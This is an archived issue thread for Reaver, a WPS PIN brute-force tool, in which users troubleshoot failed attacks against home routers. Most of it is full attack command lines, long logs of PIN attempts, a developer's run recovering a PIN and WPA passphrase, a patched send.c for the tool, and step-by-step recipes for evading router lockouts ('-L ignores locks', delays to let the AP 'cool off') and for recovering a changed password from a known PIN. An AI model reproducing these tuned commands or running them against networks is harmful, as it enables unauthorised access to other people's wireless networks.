Open GoogleCodeExporter opened 9 years ago
I'm hoping the '-120db' is a typo and you really mean -12db if they're sitting
on the same desk. :)
Yes, we have to clean up all the attachments on the project, Google limits it
to 50MB I believe. You can post a link to wherever you want to upload the pcap,
or email it to me directly, whichever you prefer.
The 0x02 and 0x03 codes are just re-iterating the messages that you are already
seeing: receive timeouts and out of order packets respectively. Without seeing
the pcap it's hard to say what the problem might be, but you might try the
--no-nacks option which will prevent Reaver from instantly NACKing out of order
packets.
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 5:36
ohmy! Yes, that's a typo!:)
I have uploaded the pcap to http://c0refailure.com/reaver-issues.zip
However, after adding the command line --no-nacks, the attack *appears* to be
working! It is definitely iterating through pins, albeit at a rate of 4
seconds/pin.
Would it be of use if i attached pcap of the attack with the --no-nacks option?
Original comment by m...@c0refailure.com
on 23 Jan 2012 at 11:44
I've seen some APs that blast out M1 packets until they get an M2 response,
instead of just sending one M1 packet and waiting. The result is that Reaver
sends the M2, but then gets another M1 packet and thinks something has gone
wrong, kills the session, and starts over. The --no-nacks disables this logic,
so I suspect that's what was happening with your AP.
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 12:56
Unfortunately, I also experience similar problems:
[+] Trying pin 01405675
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
If I specify -d 5, it seems to work (@ 7 seconds/pin speed). With a lower value
than 5 it fails (as above).
Using Reaver 1.4 on BT5R1 with stock/latest compat-wireless (tested
patched/non-patched too), USB wireless adapter with ath9k_htc driver and latest
firmware (1.3). The target AP is a linksys. wash output is OK.
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 1:50
jozsi: I've run in to similar problems, some APs just can't handle faster
attempts. Out of curiosity, what model Linksys is it?
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 2:14
It's a WRT160N with stock firmware.
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 2:16
Unfortunately, after some time I start getting:
[+] Trying pin 13305673
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 13315672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 13315672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 12.18% complete @ 2012-01-23 11:20:23 (7 seconds/pin)
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
...snip...
[+] Trying pin 13325671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 4:24
jozsi, how long does this last? Does it recover and start trying pins again?
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 4:41
I notice the same issue on several APs after upgrade to reaver 1.4. With
reaver 1.3 all these APs were easily attackable but now it just loops on one
PIN number.
I even tried supplying a known PIN under reaver 1.4 and no luck in attacking
WPS even when the PIN in known. Here is the output:
root@root:~/reaver-1.4/src# reaver -i mon0 -vv -b 00:18:E7:E7:59:4E -c 1
--pin=60251749
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:18:E7:E7:59:4E
[+] Associated with 00:18:E7:E7:59:4E (ESSID: dlink)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 90.95% complete @ 2012-01-23 08:48:46 (9 seconds/pin)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.99% complete @ 2012-01-23 08:49:16 (7 seconds/pin)
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 60251749
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
^C
It seems something has gone wrong in this release of reaver.
Original comment by kbus...@gmail.com
on 23 Jan 2012 at 7:18
kbuster: I just ran the 1.4 release version of Reaver from two separate
machines using two different cards (rtl8187 and ath9k) against two different
APs and specifying the pin worked for me:
reaver@reaver:~/Downloads/reaver-1.4/src$ sudo ./reaver -i mon0 -b
54:E6:FC:9A:12:50 -vv --pin=09030879 -c 9
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 9
[+] Waiting for beacon from 54:E6:FC:9A:12:50
[+] Associated with 54:E6:FC:9A:12:50 (ESSID: TP-LINK_9A1250)
[+] Trying pin 09030879
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '09030879'
[+] WPA PSK: 'super secret passphrase'
[+] AP SSID: 'TP-LINK_9A1250'
Specifying the wrong pin results in the same output that you are getting. Since
you said 1.3 worked on these same APs before, what output do you get when
running 1.3 with the --pin option specified?
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 7:42
Craig: indeed, it does recover itself within ~4 minutes. I'll post back if I
encounter a case when self-recover fails.
Original comment by jo...@tracid.ro
on 23 Jan 2012 at 8:17
Thanks jozsi. What sometimes happens is the WPS state machine in the AP gets
out of sync and you have to wait a few minutes for it to reset it self and
start accepting new pins again.
Original comment by cheff...@tacnetsol.com
on 23 Jan 2012 at 8:23
I have noticed this resetting issue in a NETGEAR AP I tested on. Found out it
accepted/replied on precisely 29 pins, then gave me timeouts/failures on the
30th attempted pin, for exactly 5 minutes (I found out by using -x298), after
which it would start accepting pin-requests again.
But then a strange thing happend;
After having successfully tried ~40% of all pins on this AP, WPS crashed (I got
only timeouts after that), while leaving everything else on the modem/router/AP
in tact, which seemed very unusual to me. This shows that WPS is a totally
separated process on this modem/AP. Even VPN configs, NAT-bypasses, all sorts
of complex configs on this AP, were still fully functional!
Only a hard reboot (power on-off-on) re-enstated the WPS functionality of this
NETGEAR modem.
Original comment by jul...@gmail.com
on 24 Jan 2012 at 10:50
I have noticed with the netgear WNR2000 that it locks after a very few
amount of tests (i'll have to check after work, but from memory it was
well less than 30!), then locked itself out for a period too. I did
notice that reaver did not continue the attack, and that i had to
restard reaver for the attack to continue.
Original comment by m...@c0refailure.com
on 25 Jan 2012 at 2:17
Hello,
I tested my linksys WAP610N AP, but i didn't success. I used TPLINK WN321G USB
Wireless card, it's supported monitoring mode and packet injection. Usually i'm
using it for wireless cracking.
Do you have any idea for this issue ?..
# reaver -i mon0 --pin=71331818 -b 38:CC:21:B9:75:23 -c 11 -vv --no-nack -d 5
-f -x298
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 38:CC:21:B9:75:23
[+] Associated with 38:CC:21:B9:75:23 (ESSID: Test_Network)
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 71331818
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
Original comment by audience...@gmail.com
on 31 Jan 2012 at 10:21
Found this today thought I would share
http://support.netgear.com/app/answers/detail/a_id/19824
"Netgear home routers will protect themselves after several failed attempts to
authenticate as an external registrar by entering a lock-down state. During the
lock-down state, all WPS attempts using the Router PIN will not work. The
router will return from the lock-down state after a predetermined time period. "
I think we need to dial in on that predetermined time.
Original comment by SuperSeo...@gmail.com
on 9 Feb 2012 at 11:11
I'm using ALfa rtl8187. reaver 1.4
found this way to make it work
1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7
hope this help ;)
Original comment by itmanvn
on 12 Feb 2012 at 2:46
[deleted comment]
ran into this issue with latest reaver from git sources.
Original comment by gentooli...@gmail.com
on 1 May 2012 at 8:37
[deleted comment]
I pretty much end up with this same listing of messages, over and over, never
moving forward on the pin attempts.
reaver -i mon0 -b BSSID -vv -x 60
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[!] WARNING: Failed to associate with BSSID (ESSID: XXX)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
Then it starts over again. Have tried with the --no-nack also, does not seem to
make a difference.
Original comment by g00gl3c...@gmail.com
on 9 May 2012 at 8:24
[deleted comment]
I have run into this problem repeatedly and I think I've figured it out. First
of all, I would recommend that everyone read the documentation on reaver on
code.google.com (i.e. Resources, FAQ, HintsAndTips, SupportedWirelessDrivers,
and README documents at http://code.google.com/p/reaver-wps/w/list ). These
documents are extremely informative. The commands below have worked on the last
5 routers that I have successfully cracked. Cracking wpa2 is a bit of an
artform. You have to feel out each router. Sometimes routers simply don't like
having the default 1 second delay between pin attempts. I had one router that
gave me error code 0x02 consistently, until I changed the delay time to 60
seconds! (i.e. "-d 60").. Any less than 60 seconds and it would give me a code
0x02 error. Another router I was working on didn't like the default timeout
period for receiving the M5 and M7 WPS response messages which is 0.1 seconds
so I changed the default timeout to 0.5 seconds (i.e. "-T .5") and it was
running flawlessly.
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x
360
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 5 -r 3:5 -T .5 -x 360
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x
360
"-i mon0" obviously you'll need to specifiy the interface.
"-c 11" I find that specifying the channel stops reaver from needlessly channel
surfing in this example I used channel 11.
"-b 00:01:02:03:04:05" this is the bssid which is another required arguement in
reaver.
"-vv" This is the verbose option. Unlike the original verbose (i.e. "-v") this
option provides twice the orignal verbosity. I honestly prefer the "-v" option,
since I rarely run into errors as of late.
"-S" this option instructs reaver to use small diffie-hellman secret numbers.
These are pins that are common to most manufacturers of routers. In Switzerland
for example, nearly all of the routers use the same standard wps pin number and
this option checks for these kind of pins.
"-N" this is the "no nacks" option. Its one less packet to capture and can
shorten the time it takes to crack the network.
"-L" this option ignores locks
"-d 15" This is the delay time between pin attempts. Most routers like 15
seconds, but some are fine with 5 seconds and I've had one as high as 60
seconds.
"-r 3:15" this says that after 3 attempts sleep for 15 seconds. This lets the
router cool off for a bit between attacks.
"-T .5" This is the timeout period for receiving the M5 and M7 response
message. The default timeout is 0.1 seconds. I find that using .5 seconds is
sometimes preferred by some routers. You can set this option to as high as 1
second.
"-x 360" this option makes reaver sleep for 6 minutes if you get 10 failed
attempts in a row. This gives the router some time to cool off before you
resume your attack.
ADDITIONAL OPTION
"--pin=1234" Without getting too technical the wps pin is essentially validated
in two halves. Which is nice since the pin number is 8 digits and trying 10^8
or 100,000,000 different combinations would take years to crack. Since there
are two halves, however, there are only 4 digits in the first half which is
10^4 or 10,000 different combinations of pin number. In the second half there
are only 3 digits which is 10^3 or 1,000 combinations because the fourth digit
is a checksum(is a binary summation of the first 7 digits that checks for
errors during transmitting and receiving the signal). Therefore, There are
11,000 different possible pin numbers. Howver, if at any time reaver reaches
90% that means that the first 4 digits have been cracked and you should write
them down, because you can close BT5 and come back later and use this option
(i.e. "--pin=XXXX") to complete the second half of the pin number.
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x
360 --pin=2095
Furthermore if you crack the entire pin and the password is changed and EVEN IF
WPS IS TURNED OFF you can enter it as an option in the argument
"--pin=XXXXXXXX" and it will instantly give you the wpa password.
reaver -i mon0 -b 00:01:02:03:04:05 -vv --pin=12345670
Best of luck and loads of patience. :)
Original comment by Andrew.I...@gmail.com
on 14 Jul 2012 at 3:40
I should add that I was running BT5 R2 KDE (I love KDE. Transparent consoles
are awesome bc u can see the bssid's in the other consoles. And the konqueror
browser love it.) in VM Virtualbox with reaver 1.4. Download Virtualbox here
--> https://www.virtualbox.org/wiki/Downloads .. And here is a video on how to
run BT5 in virtualbox: http://www.youtube.com/watch?v=jrdovN-RVWk
Original comment by Andrew.I...@gmail.com
on 14 Jul 2012 at 4:21
^ @Andrew I tried all of the stuff you posted and variations of it but I still
get the errors below. Signal strength is -64dB so that shouldn't be the issue.
It ran perfectly for the first 20-30 mins and then after that all I got was the
following:
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 15 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 2.65% complete @ 2012-07-19 04:29:26 (0 seconds/pin)
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 15 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[!] WARNING: 10 failed connections in a row
^CSegmentation fault
root@bt:~# reaver -i mon0 -c 6 -b XX:XX:XX:XX:XX:XX -vv -S -N -L -d 30 -r 3:30
-T .5 -x 360
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 6
[?] Restore previous session for XX:XX:XX:XX:XX:XX? [n/Y] Y
[+] Restored previous session
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: Belkin.XX)
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Entering recurring delay of 30 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 2.65% complete @ 2012-07-19 04:37:13 (0 seconds/pin)
[+] Entering recurring delay of 30 seconds
[+] Trying pin 02815671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Session saved.
Original comment by ronquil...@gmail.com
on 19 Jul 2012 at 5:13
Andrew - encouraging results from your suggested parameters. Thanks for the
insight. I'm trialing Reaver on my Sagem AP ('Sky' box). Tricky little bugger,
particularly as it likes to lock for 60 minutes (literally 3600 seconds) once
it's spooked. You have to power-off for a few seconds to clear the lock (lock
state seems to persist console/soft reboot)
Previously, I was running Reaver as follows:
reaver -i mon0 -b 12:34:56:78:90:01 -vv
I've been getting 12 to 20 attempts with that.
However, after introducing -d 15 -r 3:15 and -S, the AP allows for 30 attempts
before locking. I will continue to play with the parameters, particularly an
increase in -d 60 as recommended. Luckily, the AP doesn't seem to lock
permanently as that would be a pain to have to keep going into the console to
enable it.
Cheers,
bt
Original comment by butttof...@gmail.com
on 23 Jul 2012 at 11:27
Any other tips for 0x02 and 0x04 (with M1 and M2 working) ?
Original comment by ronquil...@gmail.com
on 25 Jul 2012 at 9:20
Here's something that may help anyone who keeps receiving lower-M messages
after sending a response to the initial message. While low signal &
interference obviously play a part, I recently had significant trouble with a
Netgear router w/~56 RSSI. Clearly a good signal, but I couldn't rule out
interference. However, I was until recently employed for a mobile phone
manufacturer (yep, the one which just laid of thousands of people) wherein we
would occasionally have trouble with cell networks that mimic the problem I was
having with the Netgear router. Poor signal and interference do not
necessarily mean the receiving end does not get the message...just that the
phone and/or tower got responses back faster than they were expecting. Sorry
for the lengthy background info, but delays in sending messages was often the
answer.
I stuck in a 2/10 sec delay after receiving M-messages from the target router
before sending a response. The result, for me, was phenomenal. It has also
vastly improved cracking times which were previously abysmal on a few other
routers due to low signal strength. I should also mention that I included '-d
3' and '-t 10' to provide more tolerance for interference/low signal strength.
YMMV with both the message delays and the command line options. I would be
interested in hearing others' results though.
So, without further ado, if anyone would like to give this a shot replace the
contents of 'send.c' with the code pasted below and recompile (make clean,
configure, make, make install).
/*
* Reaver - Transmit functions
* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
*
* In addition, as a special exception, the copyright holders give
* permission to link the code of portions of this program with the
* OpenSSL library under certain conditions as described in each
* individual source file, and distribute linked combinations
* including the two.
* You must obey the GNU General Public License in all respects
* for all of the code used other than OpenSSL. * If you modify
* file(s) with this exception, you may extend this exception to your
* version of the file(s), but you are not obligated to do so. * If you
* do not wish to do so, delete this exception statement from your
* version. * If you delete this exception statement from all source
* files in the program, then also delete it here.
*/
#include "send.h"
/* Initiate the WPS session with an EAPOL START packet */
int send_eapol_start()
{
const void *packet = NULL;
size_t packet_len = 0;
int ret_val = 0;
packet = build_eapol_start_packet(&packet_len);
if(packet)
{
cprintf(VERBOSE, "[+] Sending EAPOL START request\n");
ret_val = send_packet(packet, packet_len);
free((void *) packet);
}
/*
* This is used to track how many times an EAPOL START request is sent
* in a row.
*
* It is cleared by the process_packets() function when an EAP identity
* resquest is received.
*
* If it reaches EAPOL_START_MAX_TRIES, do_wps_exchange() will notify
* the user.
*/
set_eapol_start_count(get_eapol_start_count() + 1);
return ret_val;
}
/* Send an identity response packet */
int send_identity_response()
{
const void *packet = NULL, *identity = NULL;
size_t packet_len = 0;
int ret_val = 0;
identity = WFA_REGISTRAR;
packet = build_eap_packet(identity, strlen(identity), &packet_len);
if(packet)
{
cprintf(VERBOSE, "[+] Sending identity response\n");
ret_val = send_packet(packet, packet_len);
free((void *) packet);
}
return ret_val;
}
/* Send the appropriate WPS message based on the current WPS state
(globule->wps->state) */
int send_msg(int type)
{
int ret_val = 0;
const struct wpabuf *msg = NULL;
unsigned char *payload = NULL;
const void *packet = NULL;
size_t packet_len = 0;
uint16_t payload_len = 0;
enum wsc_op_code opcode = 0;
struct wps_data *wps = get_wps();
/*
* Get the next message we need to send based on the data retrieved
* from wps_registrar_process_msg (see exchange.c).
*/
/* cprintf(VERBOSE, "Pause .2 secs\n"); */
usleep(200000);
msg = wps_registrar_get_msg(wps, &opcode, type);
set_opcode(opcode);
if(msg)
{
/* Get a pointer to the actual data inside of the wpabuf */
payload = (unsigned char *) wpabuf_head(msg);
payload_len = (uint16_t) msg->used;
/* Build and send an EAP packet with the message payload */
packet = build_eap_packet(payload, payload_len, &packet_len);
if(packet)
{
if(send_packet(packet, packet_len))
{
ret_val = 1;
} else {
free((void *) packet);
}
}
wpabuf_free((struct wpabuf *) msg);
}
return ret_val;
}
/*
* Send a WSC_NACK message followed by an EAP failure packet.
* This is only called when completely terminating a cracking session.
*/
void send_termination()
{
const void *data = NULL;
size_t data_size = 0;
data = build_eap_failure_packet(&data_size);
if(data)
{
send_packet(data, data_size);
free((void*) data);
}
}
/* Send a WSC_NACK message */
void send_wsc_nack()
{
struct wps_data *wps = get_wps();
wps->state = SEND_WSC_NACK;
send_msg(SEND_WSC_NACK);
}
/*
* All transmissions are handled here to ensure that the receive timer
* is always started immediately after a packet is transmitted.
*/
int send_packet(const void *packet, size_t len)
{
int ret_val = 0;
if(pcap_inject(get_handle(), packet, len) == len)
{
ret_val = 1;
}
start_timer();
return ret_val;
}
Original comment by jeff.j.h...@gmail.com
on 27 Aug 2012 at 10:55
I am having the same issues could someone guild me of how I go about the last
comment here by Jeff? Or is is there a place I can download his Reaver changes
that I can install. His instructions are as follows:
" So, without further ado, if anyone would like to give this a shot replace the contents of 'send.c' with the code pasted below and recompile (make clean, configure, make, make install)."
Thanks for any help anyone can give me.
Original comment by cashcla...@gmail.com
on 26 Sep 2012 at 5:10
To Cashcla...
Notice that jeff is not referring to the main issue on the thread (repeatedly
receiving errors with code 0x02 and 0x03). It seems he is receiving an M
response lower than the M message he sent i.e. he sends an M2 message and gets
back an M1 response. Notice g00gl3c... has this error at the tail of his log in
comment 21. Make sure you understand this is a fix for this error (according to
Jeff, I actually haven't tested it, but you should trust him, no harm in
trying.) If this is in fact the error you are recieving, then go ahead and try
out Jeff's code.
If I understand your question, your are asking how to make a change on to file
of a program managed by Make and reinstall the program. Here is how to apply
Jeff's change for the linux noob (no offense, keep at it, you learn quick.)
Open up a terminal and do as follows (for most if not all linux, just type
commands as you see them if not noted otherwise, anything after a # is a
comment):
cd /to/your/reaver/directory # replace with where you originally put reaver
cd src/
gedit jeffsendc.txt # or whatever text editor you have, I suggest one with a gui
# if you don't have very much experience
# Now in the blank text file copy in the code for send.c in Jeff's comment
# then save it and close. Back to the terminal:
sudo make distclean
cp send.c send.c.old
rm send.c
cat jeffsendc.txt > send.c
./confgure
make
sudo make install
# now you are done applying jeff's changes!
# maybe it turns out you actually don't want this change, maybe it causes
# full of bugs and acts really unexpectedly, this is how you revert back to the
# original. If this is the case, open up the terminal again, and just like
before,
# input the commands as follows:
cd /to/your/reaver/directory # replace with where you originally put reaver
cd src/
sudo make distclean
rm send.c
mv send.c.old send.c
./confgure
make
sudo make install
# everything should be back to normal
Original comment by mikedan...@gmail.com
on 18 Oct 2012 at 8:52
[deleted comment]
..........SOLVED.............
for Ralink RT2870/3070 chipset --- rt2800usb ---- my device is edup ed-3070usb
i'm using BT5R1 GNOME VMWARE 32 bit & vmware player 4.0.3 703057
-----------------------------------------------------------------
OPEN THE TERMINAL and write
1- airmon-ng -------------------(show ur interface)
2- airmon-ng start wlan0 ------(u should start mon0 with this code)
3- iwconfig -------------------(and check ur wlan0 and mon0)
4- wicd start ------------------(we should start to wicd)
5- apt-get install wicd-curses -(only suggestion-i'm using that sometimes...
OPTIONAL)
----------------------------------------------------------------
NOW HERE WE GO
FIRSTLY CLEAR THE TERMINAL WITH clear
6- clear -----------------------( no comments, whatever )
7- wash -i mon0 -s -C -----------(show wps and select one)
8- reaver -i mon0 -b 00:11:22:33:44:55 -c 1 -d 15 -vv
